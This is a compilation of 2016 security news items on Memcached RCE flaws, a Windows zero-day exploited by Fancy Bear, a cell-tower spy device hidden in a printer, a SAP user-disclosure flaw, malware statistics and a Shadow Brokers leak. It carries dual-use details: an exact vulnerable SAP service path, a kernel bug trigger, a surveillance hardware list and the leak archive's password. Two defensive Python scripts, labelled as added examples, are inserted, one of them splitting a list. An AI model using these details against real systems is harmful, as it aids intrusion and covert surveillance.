Memcached is widely used by thousands upon thousands of websites, including popular social networking sites such as Facebook, Flickr, Twitter, Reddit, YouTube, Github, and many more.
Nikolich says he discovered multiple integer overflow bugs in Memcached that could be exploited to remotely run arbitrary code on the targeted system, thereby compromising the many websites that expose Memcached servers to the Internet.
The vulnerabilities actually reside in "various Memcached functions that are used in inserting, appending, prepending, or modifying key-value data pairs."
CVE-2016-8704: Memcached Server Append/Prepend Remote Code Execution Vulnerability
CVE-2016-8705: Memcached Server Update Remote Code Execution Vulnerability
CVE-2016-8706: Memcached Server SASL Authentication Remote Code Execution Vulnerability
Hackers Can Remotely Steal Sensitive Information
The vulnerabilities are triggered by sending repeated, specially crafted Memcached commands to the targeted servers.
Moreover, the flaws could also be exploited to leak sensitive process information that can further be used to bypass standard exploitation mitigations, like ASLR (Address Space Layout Randomisation), making the attacks reliable and considerably "severe."
By default, Memcached service installed on your server is available to the world on TCP port 11211, so it has always been strongly recommended to limit its access within a trusted environment, behind the firewall.
So, if you have not yet updated your software to the latest release and your Memcached service is publicly accessible, an attacker could simply exploit these vulnerabilities to remotely steal sensitive information cached by the server without your knowledge.
What's even worse? These flaws could allow hackers to replace cached content with malicious content in order to deface the website or serve phishing pages and malicious links to hijack victims' machines, placing hundreds of millions of online users at risk.
Patch your Memcached Server Now!
The integer overflow flaws in Memcached affect Memcached version 1.4.31 and earlier.
The researcher notified the Memcached maintainers of the flaws, and they took only two days to build a patch, released on 31st October.
Memcached says the critical remote code execution flaws "are related to the binary protocol as well as SASL authentication of the binary protocol," and that they have been fixed in the latest release.
Customers are advised to apply the patch even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.
Simplifying SSH keys and SSL Certs Management across the Enterprise using Key Manager Plus
2.11.2016 thehackernews Safety
With rapidly growing web-based services and widely expanding locations, organizations are using more SSL certificates and SSH keys than ever.
From authentication, confidentiality and integrity to protecting the organization from industrial espionage, SSL certificates play an important role.
Managing SSL certificates across networks to ensure protection and prevent unanticipated failures is critical, and it becomes complicated with multiple locations and divisions as well as the fast-growing use of external cloud-based services.
This not only complicates the process of managing individual SSL certificates and SSH keys for an administrator but also costs organizations heavily.
A key solution for this issue is to use an advanced and efficient SSL certificate and SSH Key management system.
An effective solution enables an organization to know what kinds of certificates and keys it has, simplifies certificate discovery and monitoring across multiple vendors, and also automates the certificate renewal and transfer process.
We recently got an opportunity to test and review Key Manager Plus from ManageEngine, which is a division of Zoho Corporation that develops remote administration software for IT businesses.
And we were quite impressed by this product that simplifies even complex processes of key management, where most organizations fail, leaving themselves vulnerable to cyber attacks.
ManageEngine Key Manager Plus
ManageEngine Key Manager Plus is a comprehensive, web-based solution that offers centralized management and visibility over the SSL certificates and SSH keys across any organization and helps administrators accurately monitor and manage them.
This application comes with a web-based interface that works on any modern web browser such as Edge, Firefox, and Chrome and you can easily deploy it on your computer with an automated installer.
The dashboard of this application is designed in such a way that after login, you get a broad and easily understandable graphical presentation of all digital assets (SSL certs and SSH keys) used by your organization.
Its easy-to-navigate user interface lets users keep track of all important details, such as the encryption algorithm, key length and creation date of each certificate, control new certificate signing requests, and access a wider range of tools.
Besides centrally creating and deploying new keys, ManageEngine Key Manager Plus also allows administrators to harden security policies by:
1. Periodically Rotating Key Pairs: Automatically rotating privileged SSH key pairs prevents misuse of keys, reduces security risks, meets compliance requirements and minimizes the operational burden on IT teams.
2. Delete Unwanted Keys: It is always important to monitor the environment in order to determine which keys are no longer in use and remove them. Key Manager Plus does the same: it prevents unauthorized access to privileged accounts by removing unwanted SSH keys from vulnerable endpoints.
3. Terminate or Regulate access: Generally, in a large organization, SSH access is neither controlled nor monitored, which is a cause of most cyber threats to an organization. Administrators can easily monitor and terminate access anytime to prevent violations by obsolete accounts.
4. Alerts and Notifications: Besides key management, it is always important for an administrator to keep track of SSL certificates that are about to expire or are invalid, in order to prevent downtime. This application allows you to set customizable, recurring notifications that alert you when your SSL certificate's validity is about to expire.
Switching to SHA-2 SSL Certificates [Migration Guide]
Nearly a million websites on the Internet are using an insecure algorithm, and leading web browsers, including Chrome and Firefox, have already declared that they could start rejecting websites using potentially vulnerable SHA-1 certificates.
Since SHA-1 certs could result in system downtime, errors, and security threats, all organizations need to migrate to SHA-2 signed certificates before January 1, 2017.
ManageEngine solves this issue as well. Here's a quick step-by-step guide on how to find and replace SHA-1 with secure SHA-2 certificates in your organization using ManageEngine Key Manager Plus.
Conclusion: ManageEngine Key Manager Plus is an efficient and user-friendly solution that not only helps network administrators bypass complicated and time-consuming compliance processes by providing all the necessary tools for monitoring and managing SSL certificates and SSH keys in the first place, but also predict and prevent security breaches at their organizations.
So, if ManageEngine Key Manager Plus fits your organization, you can give it a try. The company offers three editions of the latest Key Manager Plus version, 4.5:
Free Edition: This version of Key Manager Plus is free for life and lets you manage up to 5 keys in an organization.
Evaluation Edition: This version is a 30-day evaluation edition that allows you to manage up to 10 keys in an organization (Number of keys can be increased based on request during the period of evaluation).
Standard Edition: The prices for this edition start at $595 per year for managing 50 keys.
All editions of ManageEngine Key Manager Plus can be downloaded (Windows/Linux) directly from the ManageEngine official website, and an online demo is also available in case you want to have a quick look at the application.
Microsoft Says Russian Hackers Using Unpatched Windows Bug Disclosed by Google
2.11.2016 thehackernews Vulnerebility
Google's Threat Analysis Group publicly disclosed on Monday a critical zero-day vulnerability in most versions of Windows, just 10 days after privately disclosing both zero-days to Microsoft and Adobe.
While Adobe rushed an emergency patch for its Flash Player software on October 26, Microsoft had yet to release a fix.
Microsoft criticized Google's move, saying that the public disclosure of the vulnerability — which is being exploited in the wild — before the company had time to prepare a fix, puts Windows users at "potential risk."
The result? Windows Vista through the current versions of Windows 10 are still vulnerable, and now everybody knows about the critical vulnerability.
Now, Microsoft said that the company would be releasing a patch for the zero-day flaw on 8th November, as part of its regular round of monthly security updates.
Russian Hackers are actively exploiting critical Windows kernel bug
Microsoft acknowledged the vulnerability in a blog post on Tuesday, in which the company said that the Windows kernel bug was being actively exploited by a well-known sophisticated hacking group previously linked to the Russian government.
Terry Myerson, executive vice president of Microsoft's Windows and Devices group, said the flaw was being exploited on a "low-volume scale" by the Strontium group, also known as Fancy Bear, Sofacy and APT28, in targeted attacks.
Fancy Bear is the same hacking group which has also been accused by the United States Intelligence community of hacking the US Democratic National Committee, Clinton Campaign Chair John Podesta, and former Secretary of State Colin Powell, among others.
Myerson noted that Fancy Bear, abusing the Google-reported flaw, had been sending spear-phishing emails to trick recipients into clicking on malicious links or opening bogus attachments, which end up installing malware on their machines or disclosing their personal information.
The vulnerability (CVE-2016-7855) is a local privilege escalation bug that exists in the Windows operating system kernel and can be exploited by malware to gain admin access on any Windows system.
Once exploited, the flaw can be used to escape the sandbox protection and execute malicious code on the compromised Windows machine.
Wait another Week for Windows zero-day patch
Microsoft encouraged its customers to upgrade to Windows 10, as the Edge browser on Windows 10 Anniversary Update is not affected by the Windows kernel flaw.
Microsoft engineers are working on a Windows patch, but in the meantime, there is little you can do in order to protect yourself from this attack observed in the wild.
"We have coordinated with Google and Adobe to investigate this malicious campaign and to create a patch for down-level versions of Windows," Myerson said. "Along these lines, patches for all versions of Windows are now being tested by many industry participants, and we plan to release them publicly on the next Update Tuesday, Nov 8."
For now, you are advised to update Chrome and Adobe Flash (or remove Flash completely) and, until Microsoft issues a fix, be careful what software you download, what websites you visit, and particularly what email links you click.
Stealth Cell Tower, how to spy on workers with a harmless printer
2.11.2016 securityaffairs Hacking
Stealth Cell Tower is an antagonistic GSM base station concealed in an office printer that could be used for surveillance purposes.
Are you angry with your boss or your colleagues? Do you want to spy on them? The engineer Julian Oliver has demonstrated how to do it with a tiny cellphone base station concealed in an apparently innocuous office printer.
Oliver dubbed his project Stealth Cell Tower; it is an antagonistic GSM base station concealed in an office printer.
The expert explained that Stealth Cell Tower is part of ongoing research into the practice of disguising cell towers as other things (such as trees or church spires); in 2014 he wrote an interesting article titled “Stealth Infrastructure.”
Here, Stealth Cell Tower situates this same outdoor practice indoors, where an HP printer is perhaps the most innocuous of flora.
“Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things – like trees and lamp-posts – indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.” reads a blog post on the project.
Oliver used a common HP LaserJet 1320 because it has useful free space inside the casing; inside the device he assembled a Raspberry Pi 3 with a couple of antennas, the BladeRF SDR board and the cabling needed to power these components.
The complete list of the hardware used by the expert includes:
A Hewlett Packard Laserjet 1320 printer modified to contain and power components
BladeRF x40
Raspberry Pi 3
2x short GSM omnidirectional antennae with magnetic base
2x SMA cable
Cigarette-lighter-to-USB-charger circuit (converting 12-24v to 5v)
1x USB Micro cable (cut and soldered to output of USB charger)
1x USB A cable (cut and soldered to printer mainboard)
Oliver explained that the Raspberry Pi 3 was chosen after failed attempts to achieve stable YateBTS performance on the Intel Edison, Beaglebone Black and I-MX6 Marsboard, that were first choices due to their small footprint.
“The Raspberry Pi 3 was chosen after failed attempts to achieve stable YateBTS performance on the Intel Edison (tiny – would’ve saved space!), Beaglebone Black and even an I-MX6 Marsboard,” he wrote. “Unlike the antiquated OpenBTS, YateBTS really seems to need those extra cores, otherwise ignoring accelerators like NEON on the Cortex A8/9 platforms.”
The core of the experiment is the code Oliver wrote to run on the tiny PC: it operates as a bogus cellphone tower that detects nearby phones and sends them SMS messages.
“Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.”
For each reply to the above messages, Stealth Cell Tower prints a transcript that includes the captured message, the victim’s unique IMSI number and other identifying data. The printer also randomly calls the victims’ phones in the vicinity and, on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is played.
It is clear that a similar configuration could be used in a real attack scenario, for example by sending out phishing SMS messages or to perform man-in-the-middle attacks against workers.
In short, it could become a very powerful surveillance device; the next time you mount a printer in the office, look inside.
You can download the full code used by the expert here (sha256sum eaabeb72eb5bf3e62cbfedb43dbc623437b40728b25555d88c9e8f06ca31d090).
Philip Hammond invokes an active defence of UK hacking back the attackers
2.11.2016 securityaffairs Hacking
The British Government announces an active defence posture in response to nation-state cyber attacks, Chancellor warns UK will retaliate against attacks.
Hacking back, or “active defence” as security experts prefer to call it, is becoming a hotly debated topic.
While the number of cyber attacks continues to increase and attackers are using even more sophisticated techniques, many Governments are planning to hack back crooks and nation-state hackers that threaten their infrastructure.
Recently, a Chinese draft cybersecurity law set out plans to hit back at foreign hackers that power.
The British government fears that “old legacy IT systems used by many organizations in the UK” are increasingly targeted by hackers who have no problem to compromise them.
Britain will strike back against nation-state actors that launch cyber attacks on its critical national infrastructure.
Chancellor Philip Hammond promised retaliatory countermeasures in response to state-sponsored attacks, he also unveiled a £1.9bn package designed to boost Government defenses against cyber threats as part of a five-year national cyber security strategy.
The Government’s five-year strategy aims to “work to reduce the impact of cyber attacks and to drive up security standards across public and private sectors.”
Hammond reiterated that the measures are a matter of national security.
Source: The Telegraph
The most interesting part of the measures announced by Hammond is the UK Government’s intention to adopt an active defence model that includes possible offensive action against attackers. Hammond explained that hacking back is the only alternative to conflict.
“Speaking before the launch, Hammond said Britain must “keep up with the scale and pace of the threats we face” and insisted that the new funding will “allow us to take even greater steps to defend ourselves in cyberspace and to strike back when we are attacked”.” reported The Guardian
“The money – which almost doubles the amount set out for a similar strategy in 2011 – will be used to improve automated defences to safeguard citizens and businesses, support the cybersecurity industry and deter attacks from criminals and “hostile actors”.”
Hammond announced a new posture of the UK against the cyber threats, with a specific focus on the protection of the nation’s critical national infrastructure and business.
“We will deter those who seek to steal from us, or harm our interests,” Hammond said at Microsoft’s Future Decoded conference in London on Tuesday. “We will strengthen law enforcement to raise cost and reduce rewards,” he said of criminal attackers.
This is just the first step on cyber security: he promised the UK would “continue to invest in cyber defense capabilities,” in particular in technology that could allow the British cyber forces to trace and hack back state-sponsored hackers.
“If we don’t have the ability to respond in cyberspace to attack that takes down power networks or air traffic control systems we would be left with the impossible choice of turning the other cheek or resorting to a military response – that’s a choice we don’t want to face.”
“No doubt the precursor to any state-on-state conflict would be a campaign of escalating cyber attack. We will not only defend ourselves in cyberspace but will strike back in kind when attacked.”
On the same day, Hammond, who chairs the Cabinet’s cross-department cyber-security committee, listed high-profile cyber attacks against British critical infrastructure.
The active defence model adopted by the UK Government includes new-generation software to detect and repel cyber attacks, as well as the creation of dedicated cyber units.
Hammond pointed to the recent deployment of an application that cut to zero the incidence of 50,000 fraudulent emails from crooks pretending to write from Government offices.
Hammond also referenced the TalkTalk data breach that exposed details of 156,959 customers and led the Information Commissioner to fine the company £400,000.
“CEOs and boards must recognise they have responsibility to manage cybersecurity,” Hammond said.
Hammond stressed that private businesses, a prime target for hackers, must also adopt a proper security posture.
“Similarly, technology companies must take responsibility for incorporating the best possible security measures into the technology of their products. Getting this right will be crucial to keeping Britain at the forefront of digital security technology.”
There is no doubt that active defence is the new approach of many governments in response to growing cyber threats.
An information disclosure flaw still impacts SAP systems exposed to the Internet
2.11.2016 securityaffairs Vulnerebility
Experts from ERPScan revealed that a SAP flaw patched in September still impacts more than 900 SAP systems exposed to the Internet.
An information disclosure vulnerability in SAP that was patched in September impacts more than 900 SAP systems that are exposed to the Internet.
According to the expert Sergiu Popa from Quenta Solutions, who reported the vulnerability, the flaw could be exploited by a remote attacker to obtain the list of SAP users from the vulnerable system. An attacker can trigger the flaw to obtain users’ data, including usernames, user IDs and emails, all information that could be used to launch spear phishing attacks and power spam campaigns.
“The vulnerability allows an external attacker to remotely obtain the list of SAP users from the system by exploiting an information disclosure vulnerability in the following service:”
/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate
“This service is actually an example of application to create a time-off request. This service should not be activated in production systems, however, it’s installed by default and, in reality, few SAP customers disable the component.
The vulnerability allows obtaining usernames, user IDs and even emails if this information was provided by a user. The information related to username and email can be used for a phishing attack by sending malware to these users.” wrote Alexander Polyakov, founder of ERPScan, in a blog post.
According to ERPScan, more than 15% of all SAP systems exposed to the Internet are estimated to be vulnerable to this flaw; currently there are at least 941 vulnerable SAP systems exposed to the Internet.
Other similar flaws have been found affecting SAP web services; experts at ERPScan recently helped fix two similar issues in other applications.
“To make matters worse, an SAP system has 1000+ of such applications enabled by default. Thus, there is a need for detailed analysis of all exposed web services,” added Polyakov from ERPScan.
ERPScan first reported this vulnerability on July 12 but withheld the details for three months to comply with SAP’s policy on public disclosure of vulnerability information.
Recent Windows Kernel zero-day exploited by hackers behind the DNC hack
2.11.2016 securityaffairs Vulnerebility
Executive vice president of Microsoft’s Windows and Devices group revealed that Windows Kernel zero-day recently disclosed was used by the Fancy Bear APT.
On Oct. 31, the Google Threat Analysis Group publicly disclosed a vulnerability in the Windows kernel that is actively being exploited by threat actors in the wild.
The zero-day could be exploited by attackers to gain administrator-level access by escaping the sandbox protection and executing malicious code.
Google’s reason for going public without waiting for a patch is that its experts had observed exploits for the flaw in the wild.
According to Google’s disclosure timeline, when a flaw is being exploited in the wild, Google publicly discloses it after seven days.
“On Friday, October 21st, we reported 0-day vulnerabilities — previously publicly-unknown vulnerabilities — to Adobe and Microsoft. Adobe updated Flash on October 26th to address CVE-2016-7855; this update is available via Adobe’s updater and Chrome auto-update.” reads a blog post published by Google.
“After 7 days, per our published policy for actively exploited critical vulnerabilities, we are today disclosing the existence of a remaining critical vulnerability in Windows for which no advisory or fix has yet been released. This vulnerability is particularly serious because we know it is being actively exploited.”
On the other hand, Microsoft criticized Google’s decision because the disclosure potentially puts customers at risk.
“We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk,” a Microsoft spokesperson said in a statement. “Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection.”
Terry Myerson, executive vice president of Microsoft’s Windows and Devices group, confirmed that the Windows kernel vulnerability was being exploited in the wild by an APT group, and the real surprise is that the crew is the same one that breached the Democratic National Committee and targeted individuals involved in Clinton’s presidential campaign.
Microsoft tracks the APT group as STRONTIUM; the names Pawn Storm, APT28 and Fancy Bear are more familiar. This means that another tech giant has recognized the APT as well-funded and capable of highly sophisticated operations. Many security firms argue that Fancy Bear is linked to the Kremlin and have detailed the investigations that led them to believe it is a Russian nation-state group.
Myerson highlighted the importance of upgrading to Windows 10 for protection from further advanced threats while waiting for a patch for the Windows Kernel zero-day.
“Recently, the activity group that Microsoft Threat Intelligence calls STRONTIUM conducted a low-volume spear-phishing campaign. Customers using Microsoft Edge on Windows 10 Anniversary Update are known to be protected from versions of this attack observed in the wild. This attack campaign, originally identified by Google’s Threat Analysis Group, used two zero-day vulnerabilities in Adobe Flash and the down-level Windows kernel to target a specific set of customers.” reads the security advisory published by Microsoft.
Microsoft customers using Windows 10 with Windows Defender Advanced Threat Protection are not exposed to exploitation of the flaw.
“Customers who have enabled Windows Defender Advanced Threat Protection (ATP) will detect STRONTIUM’s attempted attacks thanks to ATP’s generic behavior detection analytics and up-to-date threat intelligence.” continues the advisory.
Fancy Bear was one of the two APT groups involved in the DNC hack (the other being COZY BEAR); it has powered many other attacks, including the hacks of Clinton campaign chair John Podesta and former Secretary of State Colin Powell.
At the time of writing there was no news about possible use of the Windows Kernel zero-day as part of the above attacks.
Which cyber threats are currently the biggest?
2.11.2016 SecurityWorld Viruses
The Fraud trojan can modify system files and settings on a compromised device, experts warn of a threat that keeps escalating in the Czech Republic.
The most widespread computer threat in the Czech Republic at present is the malicious code Danger, which spreads through e-mail attachments. This follows from the regular monthly statistics of the security company Eset for October.
Danger has led the list of internet threats for most of this year, but its share of detected threats has begun to fall. In October it accounted for roughly a third of malware detections (35.02 percent to be exact), 12 percentage points less than in September. "It certainly cannot be said that the danger of JS/Danger.ScriptAttachment is subsiding. It remains by far the biggest threat. It can download further malicious code onto the compromised device, which makes it an even more insidious enemy," says Miroslav Dvořák, technical director of Eset.
Another downloader, Nemucod, works on a similar principle and was the second most frequently recorded internet threat in October. Its share also fell visibly compared to September, by nine percentage points to 12.32 percent.
Third place in the list of the ten most frequently detected malicious codes in October went to the trojan PDF/Fraud. "The authors' intent is to use this malware to persuade the user to fill in and send their sensitive personal data," Dvořák explains. According to him, PDF/Fraud accounted for almost five percent of all threats detected on the Czech internet in October.
Top 10 threats in the Czech Republic for October 2016:
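As an added example (not part of the SecurityWorld article or of Eset's own tooling), the following Python script shows the kind of check a mail gateway or incident responder can run against messages carrying JS/Danger.ScriptAttachment-style lures: it walks the attachments of an e-mail, flags script file types including double extensions such as `invoice.pdf.js`, and looks inside ZIP attachments, where such scripts are usually wrapped. The sample message, the placeholder script inside it and the extension lists are constructed for the demonstration.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions that Windows executes on double-click; JS/Danger.ScriptAttachment-style
# lures arrive as these, usually wrapped in a ZIP. The lists are assumptions for the example.
SCRIPT_EXTENSIONS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "ps1", "cmd", "bat", "scr"}
ARCHIVE_EXTENSIONS = {"zip"}


def classify_filename(name):
    """Reason string if the name looks like a script lure or a container, else None."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext in SCRIPT_EXTENSIONS:
        if len(parts) == 3:  # "invoice.pdf.js": the classic double-extension disguise
            return f"script with double extension (.{parts[1]}.{ext})"
        return f"script attachment (.{ext})"
    if ext in ARCHIVE_EXTENSIONS:
        return "archive"
    return None


def scan_zip(data):
    """List (member, reason) for script files inside a ZIP attachment."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                reason = classify_filename(member)
                if reason and reason != "archive":
                    hits.append((member, reason))
    except zipfile.BadZipFile:
        hits.append(("<unreadable>", "attachment claims to be ZIP but is not"))
    return hits


def scan_message(raw):
    """Return (attachment name, reason) for every suspicious attachment in an RFC 822 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        reason = classify_filename(name)
        if reason is None:
            continue
        if reason == "archive":
            for member, why in scan_zip(part.get_payload(decode=True)):
                findings.append((f"{name}:{member}", why))
        else:
            findings.append((name, reason))
    return findings


def build_sample_message():
    """Constructed sample: an 'invoice' mail with a ZIP wrapping a placeholder .js file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2016-10.pdf.js", "// placeholder text, not a real downloader\n")
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Invoice.zip")
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application", subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in scan_message(build_sample_message()):
        print(f"SUSPICIOUS {name}: {reason}")
```

The harmless `terms.pdf` passes, while the script hidden in the ZIP is reported with its full path. In a real gateway the ZIP walk should also recurse into nested archives and treat password-protected ones as suspicious by default, since those cannot be inspected.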
1. JS/Danger.ScriptAttachment (35.02 %)
2. JS/TrojanDownloader.Nemucod (12.32 %)
3. PDF/Fraud (4.99 %)
4. Java/Adwind (3.58 %)
5. JS/TrojanDownloader.FakejQuery (3.03 %)
6. DOC/Fraud (2.86 %)
7. JS/Kryptik.RE (1.95 %)
8. VBA/TrojanDownloader.Agent.BUX (1.54 %)
9. PowerShell/TrojanDownloader.Agent.Q (1.46 %)
10. JS/ProxyChanger (1.31 %)
Cyber attacks are increasingly aggressive. Britain will significantly increase spending on security
1.11.2016 Novinky/Bezpečnost Computer attack
Britain will step up the fight against cybercrime. It will spend 1.9 billion pounds (57.2 billion CZK) on improving its security over the next five years, the British Treasury announced on Tuesday. MI5 chief Andrew Parker warned of Russia's "increasingly aggressive" methods; in its rivalry with the West, he said, Russia relies far more often on cyber attacks. The investment is to focus on protecting institutions and citizens against hacker attacks. London will spend the 1.9 billion pounds on fighting cybercrime over the next five years, a 50 percent increase over the previous five-year period.
"The new strategy will allow us to take more significant steps to defend ourselves in cyberspace and to respond when we are attacked," said Chancellor Philip Hammond in the Treasury's statement.
The British government also wants to create a new institute in the coming years to conduct cyber security research. It will operate alongside the National Cyber Security Centre (NCSC), which began operating in October and has roughly 700 staff.
The director of MI5, in an interview with The Guardian today, warned that Russia is becoming an ever greater threat to Britain. According to him, Moscow uses sophisticated methods including cyber attacks to destabilise the country. Through hacking attacks Russia seeks to obtain military secrets and information about industry, the economy, and government and foreign policy, Parker says.
WiGig — New Ultra-Fast Wi-Fi Standard Ready to Boost Your Internet Speed in 2017
1.11.2016 thehackernews IT
Get ready for faster Internet because the WiFi you know today is about to change and get much, much faster.
The WiFi Alliance, a self-described "worldwide network of companies that brings you Wi-Fi," has finally certified "WiGig," an ultra-fast, short-range wireless network technology that will nearly double Wi-Fi's current top speed.
As many as 180 million devices, including routers, smartphones, laptops, tablets, and other devices, shipping by the end of next year will support WiGig, the multi-gigabit 802.11ad Wi-Fi standard operating in the 60 GHz band, the Alliance announced.
This certification program aims to encourage the production of devices and hardware that not only operate in the "less congested" 60 GHz spectrum but can also fall back to the regular Wi-Fi – 2.4 or 5 gigahertz bands – for maximum interoperability.
"Wi-Fi has delighted users for more than 15 years, and WiGig now gives users even higher performance in a rich variety of applications unleashing an unparalleled Wi-Fi experience," Wi-Fi Alliance CEO Edgar Figueroa said.
"WiGig further expands the Wi-Fi CERTIFIED portfolio into 60 GHz, and will augment existing and developing Wi-Fi programs and technologies."
WiGig can provide speeds of up to 8 Gbps, or nearly 1 GB per second, over a distance of up to 33 feet (10 meters). 8 Gbps is around three times faster than the best 802.11ac devices available right now.
This speed boost will help you download high-quality HD movies in just seconds. Also, the technology will make it possible to have super-fast wireless docks and wireless VR and AR headsets.
However, both ends of a connection must support WiGig to achieve these speeds.
The major issues with WiGig are adoption and compatibility. The WiFi Alliance also unveiled the first five certified WiGig products, from Intel, Qualcomm, and Dell, among others.
The first certified consumer products to carry the WiGig standard are Dell's Latitude 7450 and 7470 laptops, though the technology is eventually making its way into routers, tablets, notebooks, smartphones, and other categories.
Intel and Qualcomm have also had router solutions certified. Some companies, such as Samsung, have already released uncertified WiGig hardware.
The Wi-Fi Alliance expects its new WiGig standard to take off by 2017.
Shadow Brokers reveals list of Servers Hacked by the NSA
1.11.2016 thehackernews BigBrothers
The hacker group calling itself the Shadow Brokers, who previously claimed to have leaked a portion of the NSA’s hacking tools and exploits, is back with a Bang!
The Shadow Brokers published more files today, and this time the group dumped a list of foreign servers allegedly compromised by the NSA-linked hacking unit, Equation Group, in various countries to expand its espionage operations.
Top 3 Targeted Countries — China, Japan, and Korea
The data dump (archive password: payus) contains, according to researchers who examined it, 306 domain names and 352 IP addresses belonging to at least 49 countries. As many as 32 of the domains were run by educational institutes in China and Taiwan.
A few target domains were based in Russia, and at least nine domains include .gov websites.
The top 10 targeted countries include China, Japan, Korea, Spain, Germany, India, Taiwan, Mexico, Italy, and Russia.
The latest dump has been signed by the same key as the first Shadow Brokers’ dump of NSA exploits, though there is a lot to be done to validate the contents of the leaked data dump fully.
Targeted Systems — Solaris, Unix, Linux and FreeBSD
Most of the affected servers were running Solaris, Oracle's Unix-based operating system, while some were running FreeBSD or Linux.
Each compromised server is reportedly associated with INTONATION or PITCHIMPAIR, code names of NSA cyber-espionage programs.
The data dump also contains references to a list of previously undisclosed Equation Group tools, including Dewdrop, Incision, Orangutan, Jackladder, Reticulum, Patchicillin, Sidetrack and Stoicsurgeon.
The tools as mentioned above could be hacking implants, tools or exploits used by the NSA's notorious group.
Security researcher Mustafa Al-Bassam, an ex-member of Lulzsec and the Anonymous hacking collective, said the NSA likely compromised all the servers between 2000 and 2010.
"So even the NSA hacks machines from compromised servers in China and Russia. This is why attribution is hard," Al-Bassam added.
Are Hackers trying to influence U.S. Presidential elections?
A message accompanying the leaked data dump calls for attempts to disrupt the forthcoming United States presidential election. The portion of message from the Shadow Brokers reads:
"TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped the election from coming? Maybe hacking election is being the best idea? #hackelection2016."
Targeted victims can use the leaked files in an effort to determine if they were the potential target of the NSA-linked hacking unit.
Since the records are old, many servers should now be clean of infection. However, a brief Shodan scan of these domains indicates that some of the affected servers are still active and still running old, possibly-vulnerable systems.
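As an added example (not from the article or from any of the researchers it cites), the following Python script shows how an organization can check its own assets against a list in the shape of the leaked index: hostnames are matched against owned domains and IP addresses against owned network ranges, and malformed lines are skipped rather than aborting the run. The sample lines use reserved documentation addresses and example domains; they are constructed for the demonstration and are not entries from the dump.

```python
import ipaddress

# Constructed sample in the shape of the leaked index ("hostname ip" per line).
# Reserved documentation addresses and example domains, not entries from the dump.
SAMPLE_INDEX = """\
# host ip
mail.example.edu 192.0.2.15
ns1.example.net 198.51.100.7
www.example.gov 203.0.113.42
bad line without address
"""


def parse_index(text):
    """Return (hostname, ip_address) pairs, skipping comments and malformed lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, _, addr = line.partition(" ")
        try:
            entries.append((host.lower().rstrip("."), ipaddress.ip_address(addr.strip())))
        except ValueError:
            continue  # second column is not an address; a real index may carry extra columns
    return entries


def host_in_domains(host, domains):
    """True when host equals, or is a subdomain of, one of the owned domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def find_exposure(index_text, owned_domains, owned_networks):
    """Return (host, ip, reason) for every index entry that touches the owned estate."""
    domains = [d.lower().rstrip(".") for d in owned_domains]
    networks = [ipaddress.ip_network(n, strict=False) for n in owned_networks]
    hits = []
    for host, ip in parse_index(index_text):
        reasons = []
        if host_in_domains(host, domains):
            reasons.append("domain")
        if any(ip in net for net in networks):
            reasons.append("network")
        if reasons:
            hits.append((host, str(ip), "+".join(reasons)))
    return hits


if __name__ == "__main__":
    # Assumed inventory of the checking organization (constructed).
    for host, ip, reason in find_exposure(SAMPLE_INDEX, ["example.edu"], ["203.0.113.0/24"]):
        print(f"{host} ({ip}) matched by {reason}")
```

Matching by network as well as by name matters because the index is years old: a hostname may have been retired while the address block is still yours, and an address in your range under a name you no longer recognize is exactly the forgotten host worth re-examining.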
The latest release comes after the FBI arrested Harold Thomas Martin, an NSA contractor, who was reportedly a prime suspect in The Shadow Brokers case.
Google discloses Critical Windows Zero-Day that makes all Windows Users Vulnerable
1.11.2016 thehackernews Vulnerability
Google has once again publicly disclosed a zero-day vulnerability in current versions of Windows operating system before Microsoft has a patch ready.
Yes, the critical zero-day is unpatched and is being used by attackers in the wild.
Google made the public disclosure of the vulnerability just 10 days after privately reporting the issue to Microsoft, giving the company little time to develop and deploy a fix.
According to a blog post by Google's Threat Analysis Group, the reason for going public is that it has seen exploits for the vulnerability in the wild, and its disclosure policy gives vendors seven days to patch or publicly report a bug that is under active exploitation.
Windows Zero-Day is Actively being Exploited in the Wild
The zero-day is a local privilege escalation vulnerability in the Windows kernel. Triggered from inside a browser sandbox, it can be used to escape the sandbox and execute malicious code on the compromised system.
The flaw "can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD," Google's Neel Mehta and Billy Leonard said in a blog post.
"Chrome's sandbox blocks win32k.sys system calls using the Win32k lockdown mitigation on Windows 10, which prevents exploitation of this sandbox escape vulnerability."
The blog post also notes that Google reported a zero-day flaw (CVE-2016-7855) in Flash Player to Adobe at the same time as it contacted Microsoft. Adobe pushed an emergency patch for its software last Wednesday.
